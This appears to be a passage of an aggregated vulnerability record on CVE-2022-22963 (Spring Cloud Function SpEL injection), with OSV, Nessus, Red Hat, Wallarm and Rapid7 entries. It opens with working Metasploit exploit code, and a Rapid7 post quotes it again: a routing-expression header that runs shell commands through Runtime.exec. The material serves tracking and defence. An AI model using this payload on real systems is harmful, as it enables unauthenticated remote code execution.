1,\n 'DefaultOptions' => {\n 'RPORT' => 8080,\n 'TARGETURI' => '/functionRouter'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n )\n\n return CheckCode::Unknown unless res\n\n # both vulnerable and patched servers respond with 500 and a JSON body with these keys\n return CheckCode::Safe unless res.code == 500\n return CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set)\n\n # best we can do is detect that the service is running\n CheckCode::Detected\n end\n\n def exploit\n print_status(\"Executing #{target.name} for 
#{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500\n end\nend\n", "sourceHref": "https://0day.today/exploit/37565", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-05-18T05:36:04", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-03T00:00:59", "type": "osv", "title": "Code Injection in Spring Cloud Function", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-05-18T04:18:21", "id": "OSV:GHSA-6V73-FGF6-W5J7", "href": "https://osv.dev/vulnerability/GHSA-6v73-fgf6-w5j7", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-04-22T19:43:25", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in access to local resources.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-03-31T00:00:00", "type": "nessus", "title": "Spring Cloud Function < 3.1.7 / 3.2.X < 3.2.3 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-04T00:00:00", "cpe": [], "id": "WEB_APPLICATION_SCANNING_113214", "href": "https://www.tenable.com/plugins/was/113214", "sourceData": "No source data", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T17:29:08", "description": "The version of Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability in the routing functionality. 
A remote, unauthenticated attacker could provide a specially crafted SpEL as a routing expression that may result in remote code execution on the remote host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-14T00:00:00", "type": "nessus", "title": "VMware Spring Cloud Function < 3.1.7 / 3.2.x < 3.2.3 SPEL Expression Injection (local check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-26T00:00:00", "cpe": ["cpe:/a:vmware:spring_cloud_function"], "id": "SPRING_CVE-2022-22963_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/159730", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159730);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/26\");\n\n script_cve_id(\"CVE-2022-22963\");\n\n script_name(english:\"VMware Spring Cloud Function < 3.1.7 / 3.2.x < 3.2.3 SPEL Expression Injection (local check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability in\nthe routing functionality. 
A remote, unauthenticated attacker could provide a specially crafted SpEL as a\nrouting expression that may result in remote code execution on the remote host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tanzu.vmware.com/security/cve-2022-22963\");\n # https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93cb5cd5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/hktalent/spring-spel-0day-poc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Spring Cloud Function version 3.1.7 or 3.2.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22963\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Cloud Function SpEL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:spring_cloud_function\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is 
owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_spring_cloud_function_installed.nbin\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'Spring Cloud Function');\n\nvar constraints = [\n {'fixed_version' : '3.1.7'},\n {'min_version' : '3.2', 'fixed_version' : '3.2.3'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-18T17:29:54", "description": "The version of Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability in the routing functionality. A remote, unauthenticated attacker could provide a specially crafted SpEL as a routing expression that may result in remote code execution on the remote host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-03-31T00:00:00", "type": "nessus", "title": "Spring Cloud Function SPEL Expression Injection (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-05-03T00:00:00", "cpe": ["cpe:/a:vmware:spring_cloud_function"], "id": "SPRING_CLOUD_CVE-2022-22963.NBIN", "href": "https://www.tenable.com/plugins/nessus/159375", "sourceData": "Binary data spring_cloud_CVE-2022-22963.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wallarmlab": [{"lastseen": "2022-04-06T16:47:27", "description": "**Quick update**\n\n * There are two vulnerabilities: one 0-day in Spring Core which is named Spring4Shell (very severe, exploited in the wild no CVE yet) and another one in Spring Cloud Function (less severe, [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>))\n * Wallarm has rolled out the update to detect and mitigate both vulnerabilities\n * No additional actions are required from the customers when using Wallarm in blocking mode\n * When 
working in a monitoring mode, consider [creating a virtual patch](<https://docs.wallarm.com/user-guides/rules/regex-rule/#example-block-all-requests-with-the-classmoduleclassloader-body-parameters>)\n\n## **Spring4Shell**\n\nSpring Framework is an extremely popular framework used by Java developers to build modern applications. If you rely on the Java stack, it\u2019s highly likely that your engineering teams use Spring. In some cases, it only takes one specially crafted request to exploit the vulnerability.\n\nOn March 29th, 2022, information about the POC 0-day exploit in the popular Java library Spring Core appeared on Twitter. Later it turned out that two RCEs were being discussed and sometimes confused:\n\n * RCE in \"Spring Core\" (Severe, no patch at the moment) - Spring4Shell\n * RCE in \"Spring Cloud Function\" (Less severe, [see the CVE](<https://tanzu.vmware.com/security/cve-2022-22963>))\n\nThe vulnerability allows an unauthenticated attacker to execute arbitrary code on the target system. Within some configurations, it only requires a threat actor to send a specific HTTP request to a vulnerable system. Other configurations may require additional effort and research by the attacker.\n\nAt the time of writing, Spring4Shell is unpatched in the Spring Framework and there is a public proof-of-concept available. We see exploits in the wild.\n\n**Wallarm update** \n[Wallarm](<https://www.wallarm.com/>) automatically identifies Spring4Shell exploitation attempts and logs them in the Wallarm Console.\n\n**Mitigation** \nWhen using Wallarm in blocking mode, these attacks will be automatically blocked. No actions are required.\n\nWhen using a monitoring mode, we suggest creating a virtual patch. 
Feel free to reach out to [support@wallarm.com](<mailto:support@wallarm.com>) if you need assistance.\n\nThe post [Update on 0-day vulnerabilities in Spring (Spring4Shell and CVE-2022-22963)](<https://lab.wallarm.com/update-on-0-day-vulnerabilities-in-spring-spring4shell-and-cve-2022-22963/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T01:49:02", "type": "wallarmlab", "title": "Update on 0-day vulnerabilities in Spring (Spring4Shell and CVE-2022-22963)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T01:49:02", "id": "WALLARMLAB:9178CD01A603571D2C21329BF42F9BFD", "href": "https://lab.wallarm.com/update-on-0-day-vulnerabilities-in-spring-spring4shell-and-cve-2022-22963/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2022-04-11T09:28:23", "description": "Red Hat OpenShift Serverless Client kn 1.21.1 provides a CLI to interact with Red Hat OpenShift Serverless 1.21.1. 
The kn CLI is delivered as an RPM package for installation on RHEL platforms, and as binaries for non-Linux platforms.\n\nSecurity Fix(es):\n\n* spring-cloud-function: Remote code execution by malicious Spring Expression (CVE-2022-22963)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T07:34:16", "type": "redhat", "title": "(RHSA-2022:1291) Low: Release of OpenShift Serverless Client kn 1.21.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-11T08:17:49", "id": "RHSA-2022:1291", "href": "https://access.redhat.com/errata/RHSA-2022:1291", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T09:31:12", "description": "This version of the OpenShift Serverless Operator, which is supported on Red Hat OpenShift Container Platform versions 4.6, 4.7, 4.8, 4.9, and 4.10, includes a security fix. 
For more information, see the documentation listed in the References section.\n\nSecurity Fix(es):\n\n* spring-cloud-function: Remote code execution by malicious Spring Expression (CVE-2022-22963)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T08:22:04", "type": "redhat", "title": "(RHSA-2022:1292) Low: Release of OpenShift Serverless 1.21.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-11T08:22:15", "id": "RHSA-2022:1292", "href": "https://access.redhat.com/errata/RHSA-2022:1292", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2022-04-12T13:59:49", "description": "A flaw was found in Spring Cloud Function via the spring.cloud.function.routing-expression header that is modified by the attacker to contain malicious expression language code. 
The attacker is able to call functions that should not normally be accessible, including runtime exec calls.\n#### Mitigation\n\nAffected customers should update immediately as soon as patched software is available. There are no other mitigations available at this time. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:32:29", "type": "redhatcve", "title": "CVE-2022-22963", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-12T10:02:27", "id": "RH:CVE-2022-22963", "href": "https://access.redhat.com/security/cve/cve-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-04-06T16:15:25", "description": "## CVE-2022-22963 - Spring Cloud Function SpEL RCE\n\n\n\nA new `exploit/multi/http/spring_cloud_function_spel_injection` module has been developed by our very own [Spencer McIntyre](<https://github.com/smcintyre-r7>) which targets Spring Cloud Function versions Prior to 3.1.7 and 3.2.3. 
This module is unrelated to [Spring4Shell CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), which is a separate vulnerability in the WebDataBinder component of Spring Framework.\n\nThis exploit works by crafting an unauthenticated HTTP request to the target application. When the `spring.cloud.function.routing-expression` HTTP header is received by the server it will evaluate the user provided SpEL (Spring Expression Language) query, leading to remote code execution. This can be seen within the [CVE-2022-22963 Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16395/files#diff-85438aef360f2d47359f2cb9d7f9f52465f8bc23f2d9b6fa04fc4fef6eef69dbR109-R111>):\n \n \n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n \n\nBoth patched and unpatched servers will respond with a 500 server error and a JSON encoded message\n\n## New module content (1)\n\n * [Spring Cloud Function SpEL Injection](<https://github.com/rapid7/metasploit-framework/pull/16395>) by Spencer McIntyre, hktalent, and m09u3r, which exploits [CVE-2022-22963](<https://attackerkb.com/topics/1RIGeNMYFk/cve-2022-22963?referrer=blog>) \\- This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to `3.1.7` and `3.2.3`.\n\n## Bugs fixed (2)\n\n * [#16364](<https://github.com/rapid7/metasploit-framework/pull/16364>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a fix for a crash in `auxiliary/spoof/dns/native_spoofer` and adds documentation for the module.\n * [#16386](<https://github.com/rapid7/metasploit-framework/pull/16386>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a 
crash when running the `exploit/multi/misc/java_rmi_server` module against a target server, such as Metasploitable2.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-03-24T13%3A07%3A34-04%3A00..2022-03-31T11%3A00%3A06-05%3A00%22>)\n * [Full diff 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/compare/6.1.35...6.1.36>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T18:34:29", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T18:34:29", "id": "RAPID7BLOG:F708A09CA1EFFC0565CA94D5DBC414D5", "href": "https://blog.rapid7.com/2022/04/01/metasploit-weekly-wrap-up-155/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-07T13:29:14", "description": "\n\nWe have completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. We continue to monitor for new vulnerability instances and to remediate vulnerabilities on internally accessible services. We also continue to monitor our environment for anomalous activity, having found none so far. No action is required by our customers at this time.\n\n## Further reading and recommendations\n\nOur Emergent Threat Response team has put together a [detailed blog post](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) with general guidance about how to mitigate and remediate Spring4Shell. 
We will continue updating that post as we learn more about Spring4Shell and new remediation and mitigation approaches.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T14:42:42", "type": "rapid7blog", "title": "Update on Spring4Shell\u2019s Impact on Rapid7 Solutions and Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T14:42:42", "id": "RAPID7BLOG:46F0D57262DABE81708D657F2733AA5D", "href": "https://blog.rapid7.com/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-08T21:29:15", "description": "\n\n_Rapid7 has completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. 
For further information and updates about our internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>)._\n\nIf you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from the [Log4j vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>). While discovery and research is evolving, we\u2019re posting the facts we\u2019ve gathered and updating guidance as new information becomes available.\n\n## What Rapid7 Customers Can Expect\n\nThis is an evolving incident. Our team is continuing to investigate and validate additional information about this vulnerability and its impact. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates.\n\n### Vulnerability Risk Management\n\nThe April 1, 2022 content update released at 7:30 PM EDT contains authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. 
We are also targeting an Insight Agent release the week of April 11 to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable. We also have an authenticated Windows check available as of the April 7th content release, which requires the April 6th product release (version 6.6.135). More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### Application Security\n\nA block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy. tCell will also detect certain types of exploitation attempts based on publicly available payloads, and will also alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application.\n\nInsightAppSec customers can scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) released April 1, 2022. 
For guidance on securing applications against Spring4Shell, read our [blog here](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>).\n\n### Cloud Security\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nIf the vulnerability is detected in a customer environment, customers can leverage filters in InsightCloudSec to focus specifically on the highest risk resources, such as those on a public subnet, to help prioritize remediation. Users can also create a bot to either automatically notify resource owners of the existence of the vulnerability or automatically shut down vulnerable instances in their environment.\n\n### InsightIDR and Managed Detection and Response\n\nWhile InsightIDR does not have a direct detection available for this exploit, we do have behavior-based detection mechanisms in place to alert on common follow-on attacker activity.\n\n## Introduction\n\nOur team is continuing to investigate and validate additional information about this vulnerability and its impact. This is a quickly evolving incident, and we are researching development of both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. 
As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.\n\nWhile Rapid7 does not have a direct detection in place for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity. tCell will also detect certain types of exploitation based on publicly available payloads.\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates. Our next update will be at noon EDT on March 31, 2022.\n\nOn March 30, 2022, rumors began to circulate about an unpatched remote code execution vulnerability in Spring Framework when a Chinese-speaking [researcher](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>) published a [GitHub 